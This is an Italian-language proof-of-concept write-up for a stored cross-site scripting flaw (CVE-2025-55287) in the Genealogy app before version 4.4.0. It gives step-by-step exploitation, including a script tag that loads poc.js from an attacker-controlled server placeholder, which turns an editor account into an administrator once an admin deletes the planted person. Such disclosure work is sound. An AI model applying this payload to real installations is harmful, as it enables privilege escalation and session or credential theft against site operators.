CVE-2025-55287-POC
Cross-Site Scripting (XSS) Memorizzato Autenticato nell'app Genealogy precedente alla versione 4.4.0 consente l'esecuzione arbitraria di JavaScript e l'escalation dei privilegi dal ruolo Editor+ ad Amministratore.
Riepilogo
- Tipo di vulnerabilità: Cross-Site Scripting Memorizzato (CWE-79)
- Componente interessato: 'Person' (nome e cognome)
- Versioni interessate: tutte le versioni precedenti alla 4.4.0
- Impatto: esecuzione persistente di JavaScript fornito dall'attaccante nei browser delle vittime; hijack di sessione, CSRF tramite DOM, manipolazione dell'interfaccia, furto di credenziali o azioni arbitrarie impersonando la vittima.
- Vettore d'attacco: autenticato (qualsiasi ruolo con creazione di nuove persone - editore+)
Sfruttamento
Causa principale: sanificazione/codifica lato server inadeguata del nome/cognome della persona in seguito alla cancellazione con successo della persona interessata da parte di un utente con privilegi più elevati.
PoC:
- Effettuare l'autenticazione all'applicazione (ruolo editore+).
- Creare una nuova persona (non deve necessariamente essere assegnata a nessuna famiglia).
- Includere il JavaScript come nome o cognome della persona aggiunta:
<script src='yourserver/poc.js'></script>
- Modificare il file
poc.js con il proprio indirizzo email nel segnaposto.
- Una volta che un utente privilegiato tenta di eliminare la persona appena creata, riceverete un invito alla piattaforma all'indirizzo email fornito con il ruolo di Amministratore.